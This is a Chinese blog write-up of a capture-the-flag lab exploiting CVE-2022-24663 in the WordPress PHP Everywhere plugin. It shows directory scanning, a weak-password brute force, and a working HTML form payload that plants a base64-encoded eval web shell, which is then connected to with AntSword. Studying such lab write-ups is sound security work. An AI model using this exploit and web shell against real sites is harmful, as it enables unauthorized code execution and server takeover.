春秋云境CVE-2022-24663

本文详细描述了一次针对远程代码执行漏洞的攻击过程,包括使用dirmap扫描发现后台、弱口令爆破获取权限,以及利用PHPEverywhere执行代码上传shell并连接蚁剑。作者强调了从公开资源获取POC进行攻击的便捷性。
摘要由CSDN通过智能技术生成

简介

远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令

正文

进入首页我们没看到任何有价值的东西,那么就只好去寻找后台登录界面咯。

dirmap扫描后台

既然要找后台界面,那么我们就直接上dirmap吧,不浪费时间了。

python dirmap.py -i http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com -lcf

成功找到后台登录界面http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/wp-login.php

进入登录界面,那么就开始尝试弱口令爆破。首先还是admin/admin不行,那就直接上字典爆破,可惜没爆出来,那么没爆出来那就只能尝试其他的账号了,然后测试发现存在test账号,那就继续爆破

弱口令爆破

直接爆破出来test/test

换上poc

靶场告诉我们在后台的任意界面都可以进行php代码的执行,那就直接在首页进行,直接f12修改源码,随便找一个div进去,点击一下鼠标右键,点击编辑html然后吧内容全部删掉。换上这个。

<form action="http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/huahua.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyJodWFodWEiXSk7Pz4=")); ?>[/php_everywhere]</textarea>
      <input type="submit" value="Execute" />
</form>

注意

其中在第一行需要换上自己靶场的地址。

在第三行我们需要换上自己定义的界面,我在这里定义的界面是huahua.php

后面base64解码的意思是<?php @eval($_POST["huahua"]);?>直接注入shell。

上传成功

然后就会出现一个这样的框框,点击execute,就会自动跳转到http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php界面。当我们看到这个ture的时候,就代表我们上传成功了。

上文也说了,我创建的界面是huahua.php我们直接访问

http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/huahua.php

成功浏览到这个界面,

蚁剑连shell

那么就直接打开蚁剑开始连shell。

结束

进入根目录直接找到flag

小结

这关没什么好说的,网上有很多的poc,我们只需要把poc拿来就可以直接注入成功了,当然我们不上传shell也可以上传命令执行,一样可以做出来。只是我觉得上shell方便就没有上命令执行了。

  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值